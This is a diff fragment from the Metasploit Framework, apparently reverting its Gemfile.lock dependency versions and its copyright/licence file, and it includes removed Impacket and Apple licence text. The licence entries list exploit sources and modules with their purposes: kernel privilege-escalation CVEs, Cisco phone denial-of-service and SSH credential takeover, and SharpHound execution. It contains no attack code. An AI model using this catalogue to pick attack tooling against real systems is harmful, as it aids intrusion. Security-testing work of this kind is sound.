-      http-accept (>= 1.7.0, < 2.0)
-      http-cookie (>= 1.0.2, < 2.0)
-      mime-types (>= 1.16, < 4.0)
-      netrc (~> 0.8)
-    rex-arch (0.1.20)
+    redcarpet (3.4.0)
+    rex-arch (0.1.13)
      rex-text
-    rex-bin_tools (0.1.16)
+    rex-bin_tools (0.1.4)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.36)
-    rex-encoder (0.1.10)
+    rex-core (0.1.13)
+    rex-encoder (0.1.4)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.44)
-      bigdecimal
+    rex-exploitation (0.1.17)
      jsobfu
      metasm
-      racc
      rex-arch
      rex-encoder
      rex-text
-      rexml
-    rex-java (0.1.8)
-    rex-mime (0.1.11)
+    rex-java (0.1.5)
+    rex-mime (0.1.5)
      rex-text
-    rex-nop (0.1.4)
+    rex-nop (0.1.1)
      rex-arch
-    rex-ole (0.1.9)
+    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.103)
-      bigdecimal
+    rex-powershell (0.1.77)
      rex-random_identifier
      rex-text
-      ruby-rc4
-    rex-random_identifier (0.1.21)
-      bigdecimal
+    rex-random_identifier (0.1.4)
      rex-text
-    rex-registry (0.1.6)
-    rex-rop_builder (0.1.6)
+    rex-registry (0.1.3)
+    rex-rop_builder (0.1.3)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.65)
-      dnsruby
+    rex-socket (0.1.10)
      rex-core
-    rex-sslscan (0.1.13)
+    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.5)
-    rex-text (0.2.63)
-      bigdecimal
-    rex-zip (0.1.6)
+    rex-struct2 (0.1.2)
+    rex-text (0.2.16)
+    rex-zip (0.1.3)
      rex-text
-    rexml (3.4.1)
-    rinda (0.2.0)
-      drb
-      forwardable
-      ipaddr
    rkelly-remix (0.0.7)
-    rspec (3.13.1)
-      rspec-core (~> 3.13.0)
-      rspec-expectations (~> 3.13.0)
-      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.5)
-      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.5)
+    rspec (3.7.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+    rspec-core (3.7.1)
+      rspec-support (~> 3.7.0)
+    rspec-expectations (3.7.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.5)
+      rspec-support (~> 3.7.0)
+    rspec-mocks (3.7.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.13.0)
-    rspec-rails (8.0.2)
-      actionpack (>= 7.2)
-      activesupport (>= 7.2)
-      railties (>= 7.2)
-      rspec-core (~> 3.13)
-      rspec-expectations (~> 3.13)
-      rspec-mocks (~> 3.13)
-      rspec-support (~> 3.13)
+      rspec-support (~> 3.7.0)
+    rspec-rails (3.7.2)
+      actionpack (>= 3.0)
+      activesupport (>= 3.0)
+      railties (>= 3.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+      rspec-support (~> 3.7.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.6)
-    rubocop (1.75.7)
-      json (~> 2.3)
-      language_server-protocol (~> 3.17.0.2)
-      lint_roller (~> 1.1.0)
-      parallel (~> 1.10)
-      parser (>= 3.3.0.2)
-      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 2.9.3, < 3.0)
-      rubocop-ast (>= 1.44.0, < 2.0)
-      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.47.1)
-      parser (>= 3.3.7.2)
-      prism (~> 1.4)
-    ruby-macho (4.1.0)
-    ruby-mysql (4.2.0)
-    ruby-prof (1.7.2)
-      base64
-    ruby-progressbar (1.13.0)
+    rspec-support (3.7.1)
+    ruby-macho (1.1.0)
    ruby-rc4 (0.1.5)
-    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.17)
-      bindata (= 2.4.15)
-      openssl-ccm
-      openssl-cmac
-      rubyntlm (>= 0.6.5)
-      windows_error (>= 0.1.4)
-    rubyntlm (0.6.5)
-      base64
-    rubyzip (2.4.1)
-    sawyer (0.9.2)
-      addressable (>= 2.3.5)
-      faraday (>= 0.17.3, < 3)
-    securerandom (0.4.1)
-    simplecov (0.18.2)
-      docile (~> 1.1)
-      simplecov-html (~> 0.11)
-    simplecov-html (0.13.1)
-    simpleidn (0.2.3)
-    sinatra (3.2.0)
-      mustermann (~> 3.0)
-      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.2.0)
-      tilt (~> 2.0)
-    sqlite3 (1.7.3)
-      mini_portile2 (~> 2.8.0)
-    sshkey (3.0.0)
-    stringio (3.1.1)
-    strptime (0.2.5)
-    swagger-blocks (3.0.0)
-    syslog (0.3.0)
-      logger
-    test-prof (1.4.4)
-    thin (1.8.2)
-      daemons (~> 1.0, >= 1.0.9)
-      eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    thor (1.4.0)
-    tilt (2.6.0)
-    timecop (0.9.10)
-    timeout (0.4.3)
-    toml (0.2.0)
-      parslet (~> 1.8.0)
-    tsort (0.2.0)
-    ttfunk (1.8.0)
-      bigdecimal (~> 3.1)
-    tzinfo (2.0.6)
-      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2025.1)
+    ruby_smb (0.0.18)
+      bindata
+      rubyntlm
+      windows_error
+    rubyntlm (0.6.2)
+    rubyzip (1.2.1)
+    sawyer (0.8.1)
+      addressable (>= 2.3.5, < 2.6)
+      faraday (~> 0.8, < 1.0)
+    signet (0.8.1)
+      addressable (~> 2.3)
+      faraday (~> 0.9)
+      jwt (>= 1.5, < 3.0)
+      multi_json (~> 1.10)
+    simplecov (0.15.1)
+      docile (~> 1.1.0)
+      json (>= 1.8, < 3)
+      simplecov-html (~> 0.10.0)
+    simplecov-html (0.10.2)
+    sqlite3 (1.3.13)
+    sshkey (1.9.0)
+    thor (0.20.0)
+    thread_safe (0.3.6)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
+    tzinfo (1.2.5)
+      thread_safe (~> 0.1)
+    tzinfo-data (1.2018.3)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.2.0)
-      unicode-emoji (~> 4.1)
-    unicode-emoji (4.1.0)
-    unix-crypt (1.3.1)
-    useragent (0.16.11)
-    warden (1.2.9)
-      rack (>= 2.0.9)
-    webmock (3.26.2)
-      addressable (>= 2.8.0)
-      crack (>= 0.3.2)
-      hashdiff (>= 0.4.0, < 2.0.0)
-    webrick (1.9.1)
-    websocket-driver (0.7.7)
-      base64
-      websocket-extensions (>= 0.1.0)
-    websocket-extensions (0.1.5)
-    win32api (0.1.0)
-    windows_error (0.1.5)
-    winrm (2.3.9)
-      builder (>= 2.1.2)
-      erubi (~> 1.8)
-      gssapi (~> 1.2)
-      gyoku (~> 1.0)
-      httpclient (~> 2.2, >= 2.2.0.2)
-      logging (>= 1.6.1, < 3.0)
-      nori (~> 2.0, >= 2.7.1)
-      rexml (~> 3.0)
-      rubyntlm (~> 0.6.0, >= 0.6.3)
-    with_env (1.1.0)
-    xdr (3.0.3)
-      activemodel (>= 4.2, < 8.0)
-      activesupport (>= 4.2, < 8.0)
-    xml-simple (1.1.9)
-      rexml
-    xmlrpc (0.3.3)
-      webrick
-    yard (0.9.37)
-    zeitwerk (2.7.3)
+    windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
+    xmlrpc (0.3.0)
+    yard (0.9.12)

 PLATFORMS
  ruby

 DEPENDENCIES
-  allure-rspec
-  debug (>= 1.0.0)
-  factory_bot_rails
+  factory_girl_rails
  fivemat
-  license_finder (= 5.11.1)
-  memory_profiler
+  google-protobuf (= 3.5.1)
+  grpc (= 1.8.3)
+  metasploit-aggregator
  metasploit-framework!
  octokit
-  pry-byebug
+  pry
  rake
  redcarpet
  rspec-rails
  rspec-rerun
-  rubocop (= 1.75.7)
-  ruby-prof
-  simplecov (= 0.18.2)
-  test-prof
+  simplecov
  timecop
-  webmock (~> 3.18)
  yard

 BUNDLED WITH
-   2.5.22
+   1.16.1
@@ -1,8 +1,8 @@
-Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
-Source: https://www.metasploit.com/
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2026, Rapid7, Inc.
+Copyright: 2006-2018, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -19,128 +19,46 @@ Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1
-Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb
-
-Files: data/exploits/cve-2023-34634/test.png
-Copyright: 2023 Brendan Watters
-License: MIT
-Purpose: These image is used as the default file to embed the exploit command.
-
-Files: data/headers/windows/c_payload_util/beacon.h
-Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
-License: Apache 2.0
-
-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
-
-Files: data/post/SharpHound.exe
-       data/post/powershell/SharpHound.ps1
-Copyright (C) 2016-2022 Specter Ops Inc.
-License: GNU GPL 3.0
-Purpose: These files are uploaded and executed by
-         post/windows/gather/bloodhound.

 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: data/webcam/api.js
-Copyright: Copyright 2013 Muaz Khan<@muazkh>.
-License: MIT
-
-Files: data/wordlists/flask_secret_keys.txt
-Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
-Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
-License: MIT
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
-License: MIT
-
-Files: external/source/exploits/CVE-2018-8120/*
-Copyright: 2018
-License: GNU GPL 3
-Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
-
-Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
-Copyright: 2022 Open Source Security, Inc.
-License: GNU GPL 2.0
-Purpose: This source file is necessary for users to create a stand-alone executable
-         to exploit CVE-2022-1043, a local privilege escalation vulnerability in
-         Linux kernels 5.12-rc3 - 5.14-rc7.
-
-Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
-Copyright: 2022 Open Source Security, Inc.
-License: GNU GPL 2.0
-Purpose: This source file is necessary for users to create a stand-alone executable
-         to exploit CVE-2022-22942, a local privilege escalation vulnerability in
-         Linux kernels 4.14-rc1 - 5.17-rc1.
-
-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copyright: 2022 Abdelhamid Naceri
-License: MIT
-
-Files: external/source/exploits/CVE-2023-36874/*
-Copyright: 2023 Octoberfest7
-License: MIT
-Purpose: Library and error report file are required for calculating offsets to the correct
-         function calls to implement the exploit.  The heavily modified C main is necessary
-         to create and trigger the exploit.
-
-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
-Purpose: This set of source code supports the following modules
-         exploits/windows/local/ms13_097_ie_registry_symlink.rb
-         exploits/windows/local/ms14_009_ie_dfsvc.rb
-
 Files: external/source/ipwn/*
 Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
-Purpose: These files are used in payloads/stages/osx/armle/execute
-
-Files: external/source/metsvc/*
-Copyright: 2007, Determina Inc.
-License: BSD-3-clause
-
-Files: external/source/osx/isight/*
-Copyright: 2009
-License: GPL
-Purpose: Used in modules/payloads/stages/osx/x86/isight to capture images.
-
-Files: external/source/pxesploit/regeditor/ntreg.h
-       external/source/pxesploit/regeditor/ntreg.c
-Copyright: 1997-2010, Petter Nordahl-Hagen
-License: LGPL
-Purpose: Unknown. These files are used to create a linux binary called regeditor
-         which allows a linux OS to edit a Windows registry. It is used in
-         pxesploit modules.

 Files: external/source/ReflectiveDLLInjection/*
 Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
 License: BSD-3-clause

-Files: external/source/shellcode/windows/build.sh
-Copyright: 2009
-License: GPL / Perl Artistic
-Purpose: A perl script to build some of the x86 Windows payloads.
+Files: external/source/metsvc/*
+Copyright: 2007, Determina Inc.
+License: BSD-3-clause
+
+Files: external/source/tightvnc/*
+Copyright: 1999 AT&T Laboratories Cambridge.
+           2000 Tridia Corp.
+           2002-2003 RealVNC Ltd.
+           2001-2004 HorizonLive.com, Inc.
+           2000-2007 Constantin Kaplinsky
+           2000-2009 TightVNC Group
+License: GPL-2

 Files: external/source/unixasm/*
 Copyright: 2004-2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
 License: BSD-4-clause

 Files: external/source/vncdll/winvnc/*
-       external/source/tightvnc/*
 Copyright: 1999 AT&T Laboratories Cambridge.
           2000 Tridia Corp.
           2002-2003 RealVNC Ltd.
@@ -148,43 +66,24 @@ Copyright: 1999 AT&T Laboratories Cambridge.
           2000-2006 Constantin Kaplinsky.
           2000-2009 TightVNC Group
 License: GPL-2
-Purpose: The built result is used in:
-           payloads/stages/windows/vncinject.rb
-           payloads/stages/windows/x64/vncinject.rb

-Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
-Copyright: 1999-2007 Apple Inc.
-License: Apple
-Purpose: This source file is necessary for users to create a stand-alone executable
-         to exploit CVE-2022-46689, a local privilege escalation vulnerability in
-         MacOSX versions (macOS dirty cow)
-
-Files: lib/anemone.rb
-       lib/anemone/*
+Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/expect.rb
-Copyright: 2017 Yukihiro Matsumoto
-License: Ruby
+Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
+Copyright: 2006-2010 Yoann GUILLOT
+License: LGPL-2.1

 Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2023 Andrew Svetlov
+Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

-Files: lib/msf/core/web_services/public/*
-       lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
-
-Files: lib/net/dns.rb
-       lib/net/dns/*
+Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/postgres_msf.rb
-       lib/postgres/postgres-pr/message.rb
-       lib/postgres/postgres-pr/connection.rb
+Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

@@ -192,13 +91,11 @@ Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby

-Files: lib/rbmysql.rb
-       lib/rbmysql/*
+Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/snmp.rb
-       lib/snmp/*
+Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

@@ -206,81 +103,17 @@ Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause

-Files: lib/zip.rb
-       lib/zip/*
+Files: lib/zip.rb lib/zip/*
 Copyright: 2002-2004, Thomas Sandergaard
 License: Ruby

-Files: modules/auxiliary/dos/cisco/cisco_7937g_dos.py
-Copyright: 2020, Cody Martin
-License: GPL
-Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
-         until it is manually power cycled.
-
-Files: modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py
-Copyright: 2020, Cody Martin
-License: GPL
-Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
-         until it automatically power cycles.
-
-Files: modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
-Copyright: 2020, Cody Martin
-License: GPL
-Purpose: This module allows an unauthenticated user to change the credentials
-         for SSH access on a Cisco 7937G device.
-
-Files: modules/auxiliary/gather/office365userenum.py
-Copyright: 2015  Oliver Morton
-License: GPL
-Purpose: Enumerates valid usernames from Office 365 using ActiveSync.
-
-Files: modules/exploits/linux/local/bpf_priv_esc.rb
-       data/exploits/CVE-2016-4557/hello
-Copyright: 2001-2007
-License: GPL
-Purpose: This module contains the source code for FUSE, which this module
-         uploads and compiles or uploads a precompiled binary (hello).
-
-Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
-Copyright: 2017
-License: GPLv2
-Purpose: The Ruby file contains the text of several modules from exploit-db
-         which it compiles and uploads to the target to elevate privileges.
-
-Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
-Copyright: 2020
-License: GPL
-Purpose: This module targets a vulnerability in Metasploit Framework versions
-         prior to 5.0.86.
-
-Files: modules/exploits/windows/smb/ms04_007_killbill.rb
-Copyright: 2004, Solar Eclipse
-License: GPL
-Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000
-         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
-         module.
-
 Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

-Files: modules/payloads/singles/windows/x64/messagebox.rb
-Copyright: 2018, jaguinaga
-License: GPL
-Purpose: This module allows us to create an x64 Windows messagebox payload.
-
-Files: modules/post/linux/dos/xen_420_dos.rb
-Copyright: 2016
-License: GPL
-Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a
-         paravirtualized VM. It contains a short code section licensed through
-         GPL.
-
-Files: tools/exploit/metasm_shell.rb
-Copyright: 2007, Yoann GUILLOT
-License: LGPL
-Purpose: Allows users to invoke an interactive metasm shell to get opcodes from
-assembly instructions.
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT

 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
@@ -770,54 +603,6 @@ License: Artistic
 DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
 ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

-License: Apache
- Version 1.1, 2000
- Modifications by CORE Security Technologies
- .
- Copyright (c) 2000 The Apache Software Foundation.  All rights
- reserved.
- .
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions
- are met:
- .
- 1. Redistributions of source code must retain the above copyright
-    notice, this list of conditions and the following disclaimer.
- .
- 2. Redistributions in binary form must reproduce the above copyright
-    notice, this list of conditions and the following disclaimer in
-    the documentation and/or other materials provided with the
-    distribution.
- .
- 3. The end-user documentation included with the redistribution,
-    if any, must include the following acknowledgment:
-       "This product includes software developed by
-        CORE Security Technologies (http://www.coresecurity.com/)."
-    Alternately, this acknowledgment may appear in the software itself,
-    if and wherever such third-party acknowledgments normally appear.
- .
- 4. The names "Impacket" and "CORE Security Technologies" must
-    not be used to endorse or promote products derived from this
-    software without prior written permission. For written
-    permission, please contact oss@coresecurity.com.
- .
- 5. Products derived from this software may not be called "Impacket",
-    nor may "Impacket" appear in their name, without prior written
-    permission of CORE Security Technologies.
- .
- THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
- WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
- ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
- USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
- OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- SUCH DAMAGE.
-
 License: Apache
 Version 2.0, January 2004
 http://www.apache.org/licenses/
@@ -1036,372 +821,3 @@ License: Zlib
 2. Altered source versions must be plainly marked as such, and must not be
    misrepresented as being the original software.
 3. This notice may not be removed or altered from any source distribution.
-
-License: Apple
-APPLE PUBLIC SOURCE LICENSE
-Version 2.0 - August 6, 2003
-
-Please read this License carefully before downloading this software.
-By downloading or using this software, you are agreeing to be bound by
-the terms of this License. If you do not or cannot agree to the terms
-of this License, please do not download or use the software.
-
-1. General; Definitions. This License applies to any program or other
-work which Apple Computer, Inc. ("Apple") makes publicly available and
-which contains a notice placed by Apple identifying such program or
-work as "Original Code" and stating that it is subject to the terms of
-this Apple Public Source License version 2.0 ("License"). As used in
-this License:
-
-1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
-the grantor of rights, (i) claims of patents that are now or hereafter
-acquired, owned by or assigned to Apple and (ii) that cover subject
-matter contained in the Original Code, but only to the extent
-necessary to use, reproduce and/or distribute the Original Code
-without infringement; and (b) in the case where You are the grantor of
-rights, (i) claims of patents that are now or hereafter acquired,
-owned by or assigned to You and (ii) that cover subject matter in Your
-Modifications, taken alone or in combination with Original Code.
-
-1.2 "Contributor" means any person or entity that creates or
-contributes to the creation of Modifications.
-
-1.3 "Covered Code" means the Original Code, Modifications, the
-combination of Original Code and any Modifications, and/or any
-respective portions thereof.
-
-1.4 "Externally Deploy" means: (a) to sublicense, distribute or
-otherwise make Covered Code available, directly or indirectly, to
-anyone other than You; and/or (b) to use Covered Code, alone or as
-part of a Larger Work, in any way to provide a service, including but
-not limited to delivery of content, through electronic communication
-with a client other than You.
-
-1.5 "Larger Work" means a work which combines Covered Code or portions
-thereof with code not governed by the terms of this License.
-
-1.6 "Modifications" mean any addition to, deletion from, and/or change
-to, the substance and/or structure of the Original Code, any previous
-Modifications, the combination of Original Code and any previous
-Modifications, and/or any respective portions thereof. When code is
-released as a series of files, a Modification is: (a) any addition to
-or deletion from the contents of a file containing Covered Code;
-and/or (b) any new file or other representation of computer program
-statements that contains any part of Covered Code.
-
-1.7 "Original Code" means (a) the Source Code of a program or other
-work as originally made available by Apple under this License,
-including the Source Code of any updates or upgrades to such programs
-or works made available by Apple under this License, and that has been
-expressly identified by Apple as such in the header file(s) of such
-work; and (b) the object code compiled from such Source Code and
-originally made available by Apple under this License.
-
-1.8 "Source Code" means the human readable form of a program or other
-work that is suitable for making modifications to it, including all
-modules it contains, plus any associated interface definition files,
-scripts used to control compilation and installation of an executable
-(object code).
-
-1.9 "You" or "Your" means an individual or a legal entity exercising
-rights under this License. For legal entities, "You" or "Your"
-includes any entity which controls, is controlled by, or is under
-common control with, You, where "control" means (a) the power, direct
-or indirect, to cause the direction or management of such entity,
-whether by contract or otherwise, or (b) ownership of fifty percent
-(50%) or more of the outstanding shares or beneficial ownership of
-such entity.
-
-2. Permitted Uses; Conditions & Restrictions. Subject to the terms
-and conditions of this License, Apple hereby grants You, effective on
-the date You accept this License and download the Original Code, a
-world-wide, royalty-free, non-exclusive license, to the extent of
-Apple's Applicable Patent Rights and copyrights covering the Original
-Code, to do the following:
-
-2.1 Unmodified Code. You may use, reproduce, display, perform,
-internally distribute within Your organization, and Externally Deploy
-verbatim, unmodified copies of the Original Code, for commercial or
-non-commercial purposes, provided that in each instance:
-
-(a) You must retain and reproduce in all copies of Original Code the
-copyright and other proprietary notices and disclaimers of Apple as
-they appear in the Original Code, and keep intact all notices in the
-Original Code that refer to this License; and
-
-(b) You must include a copy of this License with every copy of Source
-Code of Covered Code and documentation You distribute or Externally
-Deploy, and You may not offer or impose any terms on such Source Code
-that alter or restrict this License or the recipients' rights
-hereunder, except as permitted under Section 6.
-
-2.2 Modified Code. You may modify Covered Code and use, reproduce,
-display, perform, internally distribute within Your organization, and
-Externally Deploy Your Modifications and Covered Code, for commercial
-or non-commercial purposes, provided that in each instance You also
-meet all of these conditions:
-
-(a) You must satisfy all the conditions of Section 2.1 with respect to
-the Source Code of the Covered Code;
-
-(b) You must duplicate, to the extent it does not already exist, the
-notice in Exhibit A in each file of the Source Code of all Your
-Modifications, and cause the modified files to carry prominent notices
-stating that You changed the files and the date of any change; and
-
-(c) If You Externally Deploy Your Modifications, You must make
-Source Code of all Your Externally Deployed Modifications either
-available to those to whom You have Externally Deployed Your
-Modifications, or publicly available. Source Code of Your Externally
-Deployed Modifications must be released under the terms set forth in
-this License, including the license grants set forth in Section 3
-below, for as long as you Externally Deploy the Covered Code or twelve
-(12) months from the date of initial External Deployment, whichever is
-longer. You should preferably distribute the Source Code of Your
-Externally Deployed Modifications electronically (e.g. download from a
-web site).
-
-2.3 Distribution of Executable Versions. In addition, if You
-Externally Deploy Covered Code (Original Code and/or Modifications) in
-object code, executable form only, You must include a prominent
-notice, in the code itself as well as in related documentation,
-stating that Source Code of the Covered Code is available under the
-terms of this License with information on how and where to obtain such
-Source Code.
-
-2.4 Third Party Rights. You expressly acknowledge and agree that
-although Apple and each Contributor grants the licenses to their
-respective portions of the Covered Code set forth herein, no
-assurances are provided by Apple or any Contributor that the Covered
-Code does not infringe the patent or other intellectual property
-rights of any other entity. Apple and each Contributor disclaim any
-liability to You for claims brought by any other entity based on
-infringement of intellectual property rights or otherwise. As a
-condition to exercising the rights and licenses granted hereunder, You
-hereby assume sole responsibility to secure any other intellectual
-property rights needed, if any. For example, if a third party patent
-license is required to allow You to distribute the Covered Code, it is
-Your responsibility to acquire that license before distributing the
-Covered Code.
-
-3. Your Grants. In consideration of, and as a condition to, the
-licenses granted to You under this License, You hereby grant to any
-person or entity receiving or distributing Covered Code under this
-License a non-exclusive, royalty-free, perpetual, irrevocable license,
-under Your Applicable Patent Rights and other intellectual property
-rights (other than patent) owned or controlled by You, to use,
-reproduce, display, perform, modify, sublicense, distribute and
-Externally Deploy Your Modifications of the same scope and extent as
-Apple's licenses under Sections 2.1 and 2.2 above.
-
-4. Larger Works. You may create a Larger Work by combining Covered
-Code with other code not governed by the terms of this License and
-distribute the Larger Work as a single product. In each such instance,
-You must make sure the requirements of this License are fulfilled for
-the Covered Code or any portion thereof.
-
-5. Limitations on Patent License. Except as expressly stated in
-Section 2, no other patent rights, express or implied, are granted by
-Apple herein. Modifications and/or Larger Works may require additional
-patent licenses from Apple which Apple may grant in its sole
-discretion.
-
-6. Additional Terms. You may choose to offer, and to charge a fee for,
-warranty, support, indemnity or liability obligations and/or other
-rights consistent with the scope of the license granted herein
-("Additional Terms") to one or more recipients of Covered Code.
-However, You may do so only on Your own behalf and as Your sole
-responsibility, and not on behalf of Apple or any Contributor. You
-must obtain the recipient's agreement that any such Additional Terms
-are offered by You alone, and You hereby agree to indemnify, defend
-and hold Apple and every Contributor harmless for any liability
-incurred by or claims asserted against Apple or such Contributor by
-reason of any such Additional Terms.
-
-7. Versions of the License. Apple may publish revised and/or new
-versions of this License from time to time. Each version will be given
-a distinguishing version number. Once Original Code has been published
-under a particular version of this License, You may continue to use it
-under the terms of that version. You may also choose to use such
-Original Code under the terms of any subsequent version of this
-License published by Apple. No one other than Apple has the right to
-modify the terms applicable to Covered Code created under this
-License.
-
-8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
-part pre-release, untested, or not fully tested works. The Covered
-Code may contain errors that could cause failures or loss of data, and
-may be incomplete or contain inaccuracies. You expressly acknowledge
-and agree that use of the Covered Code, or any portion thereof, is at
-Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
-WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
-APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
-PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
-ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
-NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
-MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
-PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
-PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
-INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
-FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
-THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
-ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
-ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
